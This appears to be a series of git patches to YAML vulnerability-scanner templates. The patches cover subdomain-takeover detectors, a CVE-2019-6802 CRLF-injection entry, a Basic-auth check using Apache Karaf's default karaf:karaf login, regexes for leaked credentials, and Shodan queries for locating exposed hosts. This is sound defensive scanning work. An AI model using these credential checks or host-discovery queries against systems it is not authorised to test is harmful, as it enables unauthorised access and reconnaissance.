2022/04/12 From b04feae9ca29fe2cd21ff44c506605dd9e97953c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 14:31:05 +0530 Subject: [PATCH 1010/1415] Update zend-v1-xss.yaml --- vulnerabilities/zend/zend-v1-xss.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml index 788745b62a..1b31b2ec8f 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -36,4 +36,3 @@ requests: part: header words: - "text/html" - From d2cfcc32e917d54668e9f4e96293d3898b64e629 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 14:52:05 +0530 Subject: [PATCH 1011/1415] Update CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml index 15c993a74b..af9a49d03d 100644 --- a/CVE-2019-6802.yaml +++ b/CVE-2019-6802.yaml @@ -1,15 +1,19 @@ id: CVE-2019-6802 info: - name: CRLF Injection in pypiserver 1.2.5 + name: Pypiserver 1.2.5 - CRLF Injection author: 0x_Akoko severity: medium - description: CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + description: | + CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI reference: - https://vuldb.com/?id.130257 - - https://www.cvedetails.com/cve/CVE-2019-6802/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 classification: cve-id: CVE-2019-6802 + metadata: + verified: true + shodan-query: html:"pypiserver" tags: cve,cve2019,crlf,generic,pypiserver requests: From 9a27b19b3eb7ffe629326fb86c300a08d0c78249 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:12:36 +0530 Subject: [PATCH 1012/1415] Update karaf-default-login.yaml --- default-logins/apache/karaf-default-login.yaml | 17 ++++++----------- 1 file changed, 6 insertions(+), 11 deletions(-) diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml index c8d2212aba..a3d895f444 100644 --- a/default-logins/apache/karaf-default-login.yaml +++ b/default-logins/apache/karaf-default-login.yaml @@ -7,12 +7,7 @@ info: description: Apache Karaf default login credentials were discovered. reference: - https://karaf.apache.org/manual/latest/webconsole - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cwe-id: CWE-1392 - remediation: Change default karaf password for a stronger one. - tags: apache,default-login,karaf + tags: default-login,apache,karaf requests: - raw: @@ -21,16 +16,16 @@ requests: Host: {{Hostname}} Authorization: Basic {{base64('karaf:karaf')}} - redirects: true - max-redirects: 1 - + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - "Apache Karaf Web Console" - - "http://karaf.apache.org" + - "Apache Karaf Web Console - Bundles" + - "Web Console</a>" + - "Log out</a>" condition: and - type: status From 5c2c2a8e07c78995a4a9eb65bf7438906b5c395b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:13:17 +0530 Subject: [PATCH 1013/1415] Update karaf-default-login.yaml --- default-logins/apache/karaf-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml index a3d895f444..46e2b4b2a3 100644 --- a/default-logins/apache/karaf-default-login.yaml +++ b/default-logins/apache/karaf-default-login.yaml @@ -7,6 +7,9 @@ info: description: Apache Karaf default login credentials were discovered. reference: - https://karaf.apache.org/manual/latest/webconsole + metadata: + verified: true + shodan-query: realm="karaf" tags: default-login,apache,karaf requests: From 2b4175b7e6ef4d01e83423b848079051e937266b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 15:20:09 +0530 Subject: [PATCH 1014/1415] Update and rename exposed-panels/apache/apache-karaf-panel.yaml to technologies/apache/apache-karaf-panel.yaml --- exposed-panels/apache/apache-karaf-panel.yaml | 26 ------------------- technologies/apache/apache-karaf-panel.yaml | 21 +++++++++++++++ 2 files changed, 21 insertions(+), 26 deletions(-) delete mode 100644 exposed-panels/apache/apache-karaf-panel.yaml create mode 100644 technologies/apache/apache-karaf-panel.yaml diff --git a/exposed-panels/apache/apache-karaf-panel.yaml b/exposed-panels/apache/apache-karaf-panel.yaml deleted file mode 100644 index 9bdffb4115..0000000000 --- a/exposed-panels/apache/apache-karaf-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: apache-karaf-panel - -info: - name: Apache Karaf Login Panel - author: s0obi - severity: info - description: An Apache Karaf login panel was detected. - classification: - cwe-id: CWE-200 - tags: apache,karaf,panel - -requests: - - method: GET - path: - - "{{BaseURL}}:8181/system/console" - - matchers-condition: and - matchers: - - type: word - words: - - "Basic realm=\"karaf\"" - part: header - - - type: status - status: - - 401 diff --git a/technologies/apache/apache-karaf-panel.yaml b/technologies/apache/apache-karaf-panel.yaml new file mode 100644 index 0000000000..d285acce99 --- /dev/null +++ b/technologies/apache/apache-karaf-panel.yaml @@ -0,0 +1,21 @@ +id: apache-karaf-panel + +info: + name: Apache Karaf Detect + author: s0obi + severity: info + metadata: + verified: true + shodan-query: realm="karaf" + tags: tech,apache,karaf + +requests: + - method: GET + path: + - "{{BaseURL}}/system/console" + + matchers: + - type: word + part: header + words: + - 'realm="karaf' From 6ff45ea0a06dd802cae4b67b4cfa200be9d7fdf3 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Dec 2022 13:24:27 +0000 Subject: [PATCH 1015/1415] Update credentials-disclosure.yaml https://regex101.com/r/L8AgnX/1 --- exposures/tokens/generic/credentials-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index 3fb6782c16..d89477b96f 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -24,7 +24,7 @@ requests: - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 2b92930bc46d1505526fd64d5bda5389aac02826 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Dec 2022 13:25:10 +0000 Subject: [PATCH 1016/1415] Update credential-exposure.yaml https://regex101.com/r/L8AgnX/1 --- file/keys/credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 94a0bd6093..b64fe66ec9 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -32,7 +32,7 @@ file: - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 608a5df5224c775e409c1a920a7fe206638acc96 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Tue, 6 Dec 2022 18:27:05 +0100 Subject: [PATCH 1017/1415] Add files via upload --- exposed-panels/jcms-panel.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/jcms-panel.yaml diff --git a/exposed-panels/jcms-panel.yaml b/exposed-panels/jcms-panel.yaml new file mode 100644 index 0000000000..c8875742fd --- /dev/null +++ b/exposed-panels/jcms-panel.yaml @@ -0,0 +1,33 @@ +id: jcms-panel + +info: + name: Jalios JCMS Panel + author: righettod + severity: info + reference: + - https://www.jalios.com/ + metadata: + verified: true + shodan-query: html:"/jcms/" + tags: panel,jcms + +requests: + - method: GET + path: + - "{{BaseURL}}/jcms/front/privateLogin.jsp" + - "{{BaseURL}}/front/privateLogin.jsp" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Jalios JCMS" + - "JCMS_login" + - "/jcms/" + condition: or + + - type: status + status: + - 200 From ae886efeb74991057fb8c88fdec5ef7dc98b275e Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:19:12 -0500 Subject: [PATCH 1018/1415] Delete tictail-takeover.yaml This service doesn't exist anymore, since it was bought by shopify (more info: https://tictail.com/) --- takeovers/tictail-takeover.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 takeovers/tictail-takeover.yaml diff --git a/takeovers/tictail-takeover.yaml b/takeovers/tictail-takeover.yaml deleted file mode 100644 index 7fa5f78c5e..0000000000 --- a/takeovers/tictail-takeover.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: tictail-takeover - -info: - name: tictail takeover detection - author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - Host != ip - - - type: word - words: - - 'Building a brand of your own?' - - 'to target URL: <a href="https://tictail.com' - - 'Start selling on Tictail.' \ No newline at end of file From d75f4bef555ba76b1b81eefcef1d31d57a65f10a Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:23:33 -0500 Subject: [PATCH 1019/1415] Update uservoice-takeover.yaml --- takeovers/uservoice-takeover.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/takeovers/uservoice-takeover.yaml b/takeovers/uservoice-takeover.yaml index cc0cd9b81a..291f6d455f 100644 --- a/takeovers/uservoice-takeover.yaml +++ b/takeovers/uservoice-takeover.yaml @@ -5,8 +5,9 @@ info: author: MiryangJung severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,uservoice + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/163 + - https://hackerone.com/reports/269109 + tags: takeover,uservoice,hackerone requests: - method: GET From ccc880429b7ac3632f1b046472966cbea15abefb Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:35:56 -0500 Subject: [PATCH 1020/1415] Update wishpond-takeover.yaml 1. source https://www.wishpond.com/rf/136247?scid=74249&type=Merchant 2. To test this takeover is required a paid account. --- takeovers/wishpond-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wishpond-takeover.yaml b/takeovers/wishpond-takeover.yaml index 2245a4f1b2..49ec343d4a 100644 --- a/takeovers/wishpond-takeover.yaml +++ b/takeovers/wishpond-takeover.yaml @@ -21,4 +21,4 @@ requests: - type: word words: - - https://www.wishpond.com/404?campaign=true \ No newline at end of file + - 'Oops! There isn’t a Wishpond Campaign published to this page.' From 6e9d903a33a66594fd213fe6dbeaa076eb4a80e2 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 13:55:23 -0500 Subject: [PATCH 1021/1415] Update hatenablog-takeover.yaml There's no reference in `Can I takeover XYZ?` It should be considered info since there are no indications this takeover is (still) possible. --- takeovers/hatenablog-takeover.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 2edbcc511f..6723798486 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -3,9 +3,7 @@ id: hatenablog-takeover info: name: hatenablog takeover detection author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + severity: info tags: takeover requests: @@ -21,4 +19,4 @@ requests: - type: word words: - - 404 Blog is not found \ No newline at end of file + - 404 Blog is not found From 6fe5d65ae88e4cf805ca9534589a5d127458c328 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 14:05:34 -0500 Subject: [PATCH 1022/1415] Update zendesk-takeover.yaml --- takeovers/zendesk-takeover.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index d49065c7ee..766fe8c069 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -5,8 +5,10 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 + - https://hackerone.com/reports/869605 + - https://hackerone.com/reports/759454 + tags: takeover,hackerone requests: - method: GET @@ -21,4 +23,6 @@ requests: - type: word words: - - this help center no longer exists \ No newline at end of file + - "this help center no longer exists" + - "Help Center Closed" + condition:or From e6bef498da4817e2621f5c494859920e87c5652f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 00:57:54 +0530 Subject: [PATCH 1023/1415] Update wishpond-takeover.yaml --- takeovers/wishpond-takeover.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/takeovers/wishpond-takeover.yaml b/takeovers/wishpond-takeover.yaml index 49ec343d4a..a3d746e18b 100644 --- a/takeovers/wishpond-takeover.yaml +++ b/takeovers/wishpond-takeover.yaml @@ -1,12 +1,12 @@ id: wishpond-takeover info: - name: wishpond takeover detection + name: Wishpond Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + tags: takeover,wishpond requests: - method: GET @@ -21,4 +21,6 @@ requests: - type: word words: + - https://www.wishpond.com/404?campaign=true - 'Oops! There isn’t a Wishpond Campaign published to this page.' + condition: or From 163af85c58b8d89996fa2d207bd9ab62dd6f9a39 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:13:08 +0530 Subject: [PATCH 1024/1415] Update zendesk-takeover.yaml --- takeovers/zendesk-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index 766fe8c069..d663753470 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -1,14 +1,14 @@ id: zendesk-takeover info: - name: zendesk takeover detection + name: Zendesk Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 - https://hackerone.com/reports/869605 - https://hackerone.com/reports/759454 - tags: takeover,hackerone + tags: takeover,zendesk requests: - method: GET @@ -25,4 +25,4 @@ requests: words: - "this help center no longer exists" - "Help Center Closed" - condition:or + condition: or From 7dbc68bae506618df83e605941d27ceb2f867a5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:16:06 +0530 Subject: [PATCH 1025/1415] Update hatenablog-takeover.yaml --- takeovers/hatenablog-takeover.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 6723798486..281634e3a3 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -1,10 +1,13 @@ id: hatenablog-takeover info: - name: hatenablog takeover detection + name: Hatenablog Takeover Detection author: pdteam - severity: info - tags: takeover + severity: high + reference: + - https://beaglesecurity.com/blog/vulnerability/hatenablog-takeover-detection.html + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover,hatenablog requests: - method: GET From 86ec3415d656f078e11e00bb5b17a78ba8a78adf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:21:48 +0530 Subject: [PATCH 1028/1415] Update hatenablog-takeover.yaml --- takeovers/hatenablog-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 281634e3a3..a500827ac0 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -22,4 +22,4 @@ requests: - type: word words: - - 404 Blog is not found + - "404 Blog is not found" From 9d78358e920433a93041101372ea0ab112643f3a Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 14:55:14 -0500 Subject: [PATCH 1029/1415] Update smugmug-takeover.yaml --- takeovers/smugmug-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smugmug-takeover.yaml b/takeovers/smugmug-takeover.yaml index 733121b3a8..9b97da4642 100644 --- a/takeovers/smugmug-takeover.yaml +++ b/takeovers/smugmug-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - '{"text":"Page Not Found"' \ No newline at end of file + - '{"text":"Page Not Found"' From 1976f446016c376d2505009f92e27fcebc9cbe9a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:30:02 +0530 Subject: [PATCH 1030/1415] Update smugmug-takeover.yaml --- takeovers/smugmug-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smugmug-takeover.yaml b/takeovers/smugmug-takeover.yaml index 9b97da4642..4f2a70b42b 100644 --- a/takeovers/smugmug-takeover.yaml +++ b/takeovers/smugmug-takeover.yaml @@ -1,12 +1,12 @@ id: smugmug-takeover info: - name: smugmug takeover detection + name: Smugmug Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60 - tags: takeover + tags: takeover,smugmug requests: - method: GET From 144ab46b57886e652c5d6eab789eca6362629c07 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 01:36:38 +0530 Subject: [PATCH 1033/1415] Create pypiserver-detect.yaml --- technologies/pypiserver-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/pypiserver-detect.yaml diff --git a/technologies/pypiserver-detect.yaml b/technologies/pypiserver-detect.yaml new file mode 100644 index 0000000000..47f2689737 --- /dev/null +++ b/technologies/pypiserver-detect.yaml @@ -0,0 +1,25 @@ +id: pypiserver-detect + +info: + name: PyPI Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: html:"pypiserver" + tags: tech,pypiserver + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Welcome to pypiserver' + + - type: status + status: + - 200 From 43751b9bacc8d6f5e98fec2e6b5c59897ecc0ac3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 6 Dec 2022 20:06:49 +0000 Subject: [PATCH 1034/1415] Auto Generated CVE annotations [Tue Dec 6 20:06:49 UTC 2022] :robot: --- takeovers/zendesk-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index d663753470..3924fa8bee 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/23 - https://hackerone.com/reports/869605 - https://hackerone.com/reports/759454 - tags: takeover,zendesk + tags: takeover,zendesk,hackerone requests: - method: GET From 07694f7e4a124626be14780a04a06e5dee72cfc7 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:18:13 -0500 Subject: [PATCH 1035/1415] Update pantheon-takeover.yaml - Correct link to issue. - Medium article (wrote by me) --- takeovers/pantheon-takeover.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index ae5bec6ffe..31d6e35ddf 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/24 + - https://medium.com/bug-bounty/how-i-took-over-several-stanford-subdomains-also-let-me-explain-you-the-pain-to-report-it-d84b08704be8 tags: takeover requests: @@ -21,4 +22,4 @@ requests: - type: word words: - - "The gods are wise, but do not know of the site which you seek." \ No newline at end of file + - "The gods are wise, but do not know of the site which you seek." From e1e122de3bab010efe6237435a7202de125d7795 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:24:33 -0500 Subject: [PATCH 1036/1415] Update smartjob-takeover.yaml --- takeovers/smartjob-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/smartjob-takeover.yaml b/takeovers/smartjob-takeover.yaml index 4a87aceced..5d9ba6a9e5 100644 --- a/takeovers/smartjob-takeover.yaml +++ b/takeovers/smartjob-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/139 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - Job Board Is Unavailable - This job board website is either expired - - This job board website is either expired or its domain name is invalid. \ No newline at end of file + - This job board website is either expired or its domain name is invalid. From 339be047324e69ef517877e7bd3329119f3adad3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:26:11 -0500 Subject: [PATCH 1037/1415] Update feedpress-takeover.yaml As the issue indicated, it's no longer vulnerable, since 2020/9. --- takeovers/feedpress-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/feedpress-takeover.yaml b/takeovers/feedpress-takeover.yaml index 502704b37a..25b61071f8 100644 --- a/takeovers/feedpress-takeover.yaml +++ b/takeovers/feedpress-takeover.yaml @@ -3,9 +3,9 @@ id: feedpress-takeover info: name: Agilecrm Takeover Detection author: pdteam - severity: high + severity: info reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/80 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - 'The feed has not been found.' \ No newline at end of file + - 'The feed has not been found.' From 507926462d4bc6235cdf27cef78f8975f38e719e Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:27:53 -0500 Subject: [PATCH 1038/1415] Update mashery-takeover.yaml --- takeovers/mashery-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/mashery-takeover.yaml b/takeovers/mashery-takeover.yaml index 82cb049a6d..df7f87200d 100644 --- a/takeovers/mashery-takeover.yaml +++ b/takeovers/mashery-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/14 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - Unrecognized domain <strong> \ No newline at end of file + - Unrecognized domain <strong> From 34f274e8d767750ace1cd263dded0682fcf9a1f7 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:30:10 -0500 Subject: [PATCH 1039/1415] Update launchrock-takeover.yaml --- takeovers/launchrock-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/launchrock-takeover.yaml b/takeovers/launchrock-takeover.yaml index 6cfd145cf2..fe9129d337 100644 --- a/takeovers/launchrock-takeover.yaml +++ b/takeovers/launchrock-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/74 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file + - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. From 02ab8f10150024ae3c76c1bf1dd288b1c152efd6 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:32:16 -0500 Subject: [PATCH 1040/1415] Update bigcartel-takeover.yaml --- takeovers/bigcartel-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index f696dc0946..8a5c2399d6 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/158 tags: takeover requests: From 0b769d689754cd503a471a8cde8f5de2c5e5ad18 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:34:45 -0500 Subject: [PATCH 1041/1415] Update canny-takeover.yaml --- takeovers/canny-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/canny-takeover.yaml b/takeovers/canny-takeover.yaml index 8f7c242e09..c170a8e51d 100644 --- a/takeovers/canny-takeover.yaml +++ b/takeovers/canny-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/114 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - 'Company Not Found' - 'There is no such company. Did you enter the right URL?' - condition: and \ No newline at end of file + condition: and From dfce14743c44301651b47712ef2a0fa6c1b3d893 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 6 Dec 2022 15:41:54 -0500 Subject: [PATCH 1042/1415] Update aws-bucket-takeover.yaml --- takeovers/aws-bucket-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/aws-bucket-takeover.yaml b/takeovers/aws-bucket-takeover.yaml index 7eb506e5c5..e78aabeb1d 100644 --- a/takeovers/aws-bucket-takeover.yaml +++ b/takeovers/aws-bucket-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/36 tags: takeover,aws,bucket requests: From 39352833efc616697f848abbaf510aa732644df3 